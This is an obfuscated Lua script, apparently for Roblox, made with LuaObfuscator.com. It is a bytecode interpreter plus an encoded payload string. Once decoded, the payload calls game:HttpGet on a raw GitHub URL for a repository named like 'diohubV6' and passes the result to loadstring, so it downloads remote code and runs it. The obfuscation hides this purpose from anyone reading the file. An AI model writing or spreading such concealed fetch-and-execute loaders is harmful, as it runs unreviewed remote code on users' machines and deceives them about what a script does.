--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v89=v2(v0(v30,16));if v19 then local v114=v5(v89,v19);v19=nil;return v114;else return v89;end end end);local function v20(v31,v32,v33) if v33 then local v90=(v31/((5 -3)^(v32-(2 -1))))%((3 -(878 -(282 + 595)))^(((v33-(2 -1)) -(v32-1)) + (620 -(555 + 64)))) ;return v90-(v90%(932 -(857 + 74))) ;else local v91=568 -(367 + 201) ;local v92;while true do if (v91==(927 -(214 + 713))) then v92=2^(v32-(1 + 0)) ;return (((v31%(v92 + v92))>=v92) and 1) or (0 + (1637 -(1523 + 114))) ;end end end end local function v21() local v34=0 + 0 ;local v35;while true do if (v34==(1 -0)) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (1066 -((295 -227) + 997)) ;v34=1271 -(226 + 1044) ;end end end local function v22() local v36=117 -(32 + 85) ;local v37;local v38;while true do if (v36==(1 + (0 -0))) then return (v38 * (57 + 199)) + v37 ;end if (v36==(957 -(892 + 65))) then v37,v38=v1(v16,v18,v18 + 2 );v18=v18 + 2 ;v36=(3 -1) -1 ;end end end local function v23() local v39=350 -(64 + 23 + 263) ;local v40;local v41;local v42;local v43;while true do if (v39==(181 -(67 + 113))) then return (v43 * (12302277 + 4474939)) + (v42 * (160901 -95365)) + (v41 * ((1186 -(915 + 82)) + 67)) + v40 ;end if (v39==(0 -0)) then v40,v41,v42,v43=v1(v16,v18,v18 + (955 -(802 + 150)) );v18=v18 + (10 -6) ;v39=(2 -1) -0 ;end end end local function v24() local v44=0 + 0 ;local v45;local v46;local v47;local v48;local v49;local v50;while true do if ((2 -0)==v44) then v49=v20(v46,21,1218 -((2633 -1564) + 118) );v50=((v20(v46,72 -40 )==1) and  -1) or (1 -0) ;v44=(1 -0) + 2 ;end if (v44==(4 -1)) then if (v49==(0 + 0 + 0)) then if (v48==(791 -(368 + 423))) then return v50 * (0 -0) ;else local v125=18 -((1433 -(630 + 793)) + 8) ;while true do if (v125==(0 -0)) then v49=1;v47=442 -(416 + 26) ;break;end end end elseif (v49==((22144 -15609) -4488)) then return ((v48==0) and (v50 * ((1 + 0)/(0 -0)))) or (v50 * NaN) ;end return v8(v50,v49-((517 + 944) -(145 + 293)) ) * (v47 + (v48/((432 -(44 + (1827 -1441)))^(1538 -(998 + 488))))) ;end if (v44==(0 + 0)) then v45=v23();v46=v23();v44=1 + 0 ;end if (v44==(773 -(201 + 571))) then v47=1139 -(116 + 1022) ;v48=(v20(v46,4 -3 ,12 + 8 ) * (((892 -(261 + 624)) -(2 + 3))^(113 -81))) + v45 ;v44=(2964 -2103) -(814 + 45) ;end end end local function v25(v51) local v52;if  not v51 then v51=v23();if (v51==(1747 -(760 + 987))) then return "";end end v52=v3(v16,v18,(v18 + v51) -(1 + 0) );v18=v18 + v51 ;local v53={};for v69=1914 -(1789 + 124) , #v52 do v53[v69]=v2(v1(v3(v52,v69,v69)));end return v6(v53);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return function(v93,v94,v95,v96,v97,v98,v99,v100) local v93=(function() return 0;end)();local v94=(function() return;end)();local v95=(function() return;end)();while true do if ( #"]"==v93) then if (v94== #"}") then v95=(function() return v96()~=(1835 -(274 + 1561)) ;end)();elseif (v94==2) then v95=(function() return v97();end)();elseif (v94== #"nil") then v95=(function() return v98();end)();end v99[v100]=(function() return v95;end)();break;end if (0~=v93) then else local v120=(function() return 0;end)();local v121=(function() return;end)();while true do if (0==v120) then v121=(function() return 0;end)();while true do if (v121~=0) then else v94=(function() return v96();end)();v95=(function() return nil;end)();v121=(function() return 1;end)();end if (v121~=(2 -1)) then else v93=(function() return  #"[";end)();break;end end break;end end end end return v93,v94,v95,v96,v97,v98,v99,v100;end;end)();local v55=(function() return function(v101,v102,v103) local v104=(function() return 0;end)();local v105=(function() return;end)();while true do if (v104~=(0 + 0)) then else v105=(function() return 241 -(187 + 54) ;end)();while true do if (v105~=0) then else v101[v102-#"<" ]=(function() return v103();end)();return v101,v102,v103;end end break;end end end;end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {v56,v57,nil,v58};end)();local v60=(function() return v23();end)();local v61=(function() return {};end)();for v71= #":",v60 do FlatIdent_61585,Type,Cons,v21,v24,v25,v61,v71=(function() return v54(FlatIdent_61585,Type,Cons,v21,v24,v25,v61,v71);end)();end v59[ #"xnx"]=(function() return v21();end)();for v72= #":",v23() do local v73=(function() return v21();end)();if (v20(v73, #"]", #"[")==0) then local v109=(function() return 0;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();local v113=(function() return;end)();while true do if (v109~=0) then else local v122=(function() return 0;end)();while true do if (v122==(781 -(162 + 618))) then v109=(function() return 1;end)();break;end if (v122~=0) then else v110=(function() return 0 + 0 ;end)();v111=(function() return nil;end)();v122=(function() return 1;end)();end end end if (v109~=1) then else local v123=(function() return 0 + 0 ;end)();local v124=(function() return;end)();while true do if (v123~=(0 -0)) then else v124=(function() return 0 -0 ;end)();while true do if (v124==(1 + 0)) then v109=(function() return 1638 -(1373 + 263) ;end)();break;end if (v124~=(1000 -(451 + 549))) then else local v160=(function() return 0 + 0 ;end)();while true do if (v160~=(1 -0)) then else v124=(function() return 1 -0 ;end)();break;end if (v160~=0) then else v112=(function() return nil;end)();v113=(function() return nil;end)();v160=(function() return 1;end)();end end end end break;end end end if (v109==(1386 -(746 + 638))) then while true do if (v110~= #"19(") then else if (v20(v112, #"19(", #"xxx")~= #":") then else v113[ #"0313"]=(function() return v61[v113[ #"xnxx"]];end)();end v56[v72]=(function() return v113;end)();break;end if ((1 + 1)==v110) then local v143=(function() return 0;end)();local v144=(function() return;end)();while true do if (0~=v143) then else v144=(function() return 0;end)();while true do if (v144==(0 -0)) then if (v20(v112, #"~", #" ")~= #":") then else v113[343 -(218 + 123) ]=(function() return v61[v113[2]];end)();end if (v20(v112,2,1583 -(1535 + 46) )~= #"[") then else v113[ #"asd"]=(function() return v61[v113[ #"19("]];end)();end v144=(function() return 1;end)();end if (v144==(1 + 0)) then v110=(function() return  #"asd";end)();break;end end break;end end end if (v110~= #"~") then else local v145=(function() return 0 + 0 ;end)();while true do if ((561 -(306 + 254))~=v145) then else v110=(function() return 2;end)();break;end if ((0 + 0)==v145) then v113=(function() return {v22(),v22(),nil,nil};end)();if (v111==(0 -0)) then local v183=(function() return 1467 -(899 + 568) ;end)();local v184=(function() return;end)();while true do if (v183==(0 + 0)) then v184=(function() return 0 -0 ;end)();while true do if (v184==(603 -(268 + 335))) then v113[ #"-19"]=(function() return v22();end)();v113[ #".com"]=(function() return v22();end)();break;end end break;end end elseif (v111== #" ") then v113[ #"xnx"]=(function() return v23();end)();elseif (v111==(292 -(60 + 230))) then v113[ #"91("]=(function() return v23() -((574 -(426 + 146))^16) ;end)();elseif (v111== #"91(") then local v197=(function() return 0;end)();local v198=(function() return;end)();while true do if (v197~=(0 + 0)) then else v198=(function() return 1456 -(282 + 1174) ;end)();while true do if (v198==(811 -(569 + 242))) then v113[ #"19("]=(function() return v23() -((5 -3)^(1 + 15)) ;end)();v113[ #"http"]=(function() return v22();end)();break;end end break;end end end v145=(function() return 1025 -(706 + 318) ;end)();end end end if (v110==(1251 -(721 + 530))) then local v146=(function() return 0;end)();while true do if (v146==(1271 -(945 + 326))) then v111=(function() return v20(v73,2, #"-19");end)();v112=(function() return v20(v73, #"xnxx",6);end)();v146=(function() return 2 -1 ;end)();end if (v146~=(1 + 0)) then else v110=(function() return  #"\\";end)();break;end end end end break;end end end end for v74= #"\\",v23() do v57,v74,v28=(function() return v55(v57,v74,v28);end)();end return v59;end local function v29(v63,v64,v65) local v66=v63[701 -(116 + 155 + 429) ];local v67=v63[2 + 0 ];local v68=v63[1503 -(805 + 603 + 92) ];return function(...) local v75=v66;local v76=v67;local v77=v68;local v78=v27;local v79=1087 -(461 + 625) ;local v80= -(1289 -(993 + 295));local v81={};local v82={...};local v83=v12("#",...) -(1172 -(418 + 753)) ;local v84={};local v85={};for v106=0 + 0 ,v83 do if (v106>=v77) then v81[v106-v77 ]=v82[v106 + 1 + 0 ];else v85[v106]=v82[v106 + 1 ];end end local v86=(v83-v77) + 1 + 0 ;local v87;local v88;while true do v87=v75[v79];v88=v87[1 + 0 ];if ((4844>2253) and (v88<=(532 -(406 + 123)))) then if (v88<=1) then if (v88>(1769 -(1749 + 20))) then local v127=0 + 0 ;local v128;local v129;local v130;local v131;while true do if ((452==452) and (v127==(1322 -(1249 + (157 -84))))) then v128=v87[1 + (2 -1) ];v129,v130=v78(v85[v128](v13(v85,v128 + ((2565 -1419) -(466 + 198 + 481)) ,v87[6 -3 ])));v127=1;end if (v127==(5 -3)) then for v161=v128,v80 do local v162=(9182 -7282) -(106 + 1794) ;while true do if ((v162==(0 + 0)) or (4557<2087)) then v131=v131 + (754 -(239 + 514)) + 0 ;v85[v161]=v129[v131];break;end end end break;end if ((3874==3874) and (v127==(2 -1))) then v80=(v130 + v128) -((1 + 1) -1) ;v131=114 -(4 + 110) ;v127=586 -((1386 -(797 + 532)) + 383 + 144) ;end end else local v132=0;local v133;local v134;while true do if ((v132==(1427 -(41 + 1386))) or (1938>4935)) then v133=v87[1 + 1 ];v134=v85[v87[(248 -142) -((1219 -(373 + 829)) + (817 -(476 + 255))) ]];v132=1 + 0 ;end if ((1 -0)==v132) then v85[v133 + (2 -1) ]=v134;v85[v133]=v134[v87[170 -((1252 -(369 + 761)) + 26 + 18) ]];break;end end end elseif ((v88>(2 -0)) or (4255<3423)) then v85[v87[6 -4 ]]=v87[3];else v85[v87[2 + 0 ]]={};end elseif (v88<=(1 + 4)) then if (v88>(7 -3)) then local v138=v87[2 -0 ];v85[v138]=v85[v138](v13(v85,v138 + 1 ,v80));else do return;end end elseif (v88<=(71 -(30 + (66 -31)))) then v85[v87[2]]=v65[v87[3]];elseif (v88==(5 + 2)) then local v147=1257 -(1043 + 214) ;local v148;local v149;local v150;local v151;local v152;while true do if (v147==(22 -16)) then do return;end break;end if (v147==(1215 -(323 + 889))) then v87=v75[v79];v85[v87[2]]=v87[7 -4 ];v79=v79 + ((819 -(64 + 174)) -(361 + 32 + 187)) ;v87=v75[v79];v152=v87[322 -(53 + 267) ];v149,v150=v78(v85[v152](v13(v85,v152 + 1 + 0 ,v87[3])));v147=417 -(15 + (588 -190)) ;end if (v147==(987 -(18 + 964))) then v85[v152]=v85[v152](v13(v85,v152 + 1 ,v80));v79=v79 + (3 -(338 -(144 + 192))) ;v87=v75[v79];v85[v87[2 + 0 ]]();v79=v79 + (217 -(42 + 174)) + 0 ;v87=v75[v79];v147=856 -(20 + 830) ;end if (v147==(2 + 0)) then v87=v75[v79];v152=v87[2];v151=v85[v87[3]];v85[v152 + (127 -(116 + 8 + 2)) ]=v151;v85[v152]=v151[v87[1 + 3 ]];v79=v79 + (739 -(449 + 93 + 196)) ;v147=6 -(2 + 1) ;end if (v147==(2 + 2)) then v80=(v150 + v152) -(1 + 0) ;v148=(1504 -(363 + 1141)) + 0 ;for v185=v152,v80 do local v186=0 -0 ;while true do if ((0 -0)==v186) then v148=v148 + 1 ;v85[v185]=v149[v148];break;end end end v79=v79 + 1 ;v87=v75[v79];v152=v87[2];v147=1556 -(1126 + (2005 -(1183 + 397))) ;end if (v147==1) then v87=v75[v79];v85[v87[407 -(118 + 287) ]]=v65[v87[11 -8 ]];v79=v79 + (1122 -(118 + 1003)) ;v87=v75[v79];v85[v87[(15 -10) -3 ]]=v65[v87[380 -(142 + 235) ]];v79=v79 + (4 -3) ;v147=1 + 1 ;end if ((1454<=2491) and (v147==(977 -(553 + 424)))) then v148=nil;v149,v150=nil;v151=nil;v152=nil;v85[v87[2]]={};v79=v79 + (1 -(0 + 0)) ;v147=1 + 0 ;end end else v85[v87[2 + 0 ]]();end v79=v79 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034C3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F71417841702F64696F68756256362E2F726566732F68656164732F6D61696E2F536F75726365436F646500094Q00077Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
